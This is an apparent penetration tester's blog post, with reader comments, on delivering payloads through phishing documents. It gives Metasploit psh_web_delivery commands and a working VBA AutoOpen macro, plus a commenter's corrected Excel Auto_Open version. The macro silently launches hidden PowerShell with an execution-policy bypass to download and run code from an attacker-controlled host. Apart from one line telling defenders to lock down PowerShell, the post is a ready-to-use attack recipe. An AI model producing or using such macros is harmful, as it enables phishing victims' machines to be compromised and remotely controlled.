Monday, January 13, 2014

Phishing with PowerShell

I have seen quite a few tweets/comments/etc about using Powershell's functionality within the context of a Microsoft Office document/VBA (https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroCode). I am going to share a way I have been leveraging Powershell for payload delivery during phishing engagements for a while now to achieve the same end result in a much simpler fashion. The two stages are as follows:

Attacker Machine:
msf > use exploit/windows/misc/psh_web_delivery
msf exploit(psh_web_delivery) > set SRVHOST 172.16.5.11
msf exploit(psh_web_delivery) > set URIPATH boom
msf exploit(psh_web_delivery) > exploit

VBA Macro:
Sub AutoOpen()

    Call Shell("powershell.exe -w hidden -nop -ep bypass -c ""IEX ((new-object net.webclient).downloadstring('http://172.16.5.11:8080/boom'))""", 1)
End Sub

*Note: If you are using a Excel document, your macro will need to be named Auto_Open()

Save the document as a macro-enabled file.
Send to target, and upon opening....





Meanwhile back at the bat cave...



This highlights yet another reason for defenders to lock down Powershell on workstations as much as possible.

4 comments:

  1. What settings would you use if you want the target machine to connect to the attacker's machine externally (the attacker's machine is behind a NAT, but it has been port forwarded)?

    ReplyDelete
    Replies
    1. You would use whatever IP address your device that is forwarding uses.

      Delete
  2. In order for this code to work you must name the routine Auto_Open() and only use one set of quotes. At least, this was the case in Excel 2013.

    Example:
    Sub Auto_Open()
    Call Shell("powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://172.16.5.11:8080/booms'))", 1)
    End Sub

    ReplyDelete
    Replies
    1. Good to know. I believe I used Office 2007 for this post. I will update. Thanks.

      Delete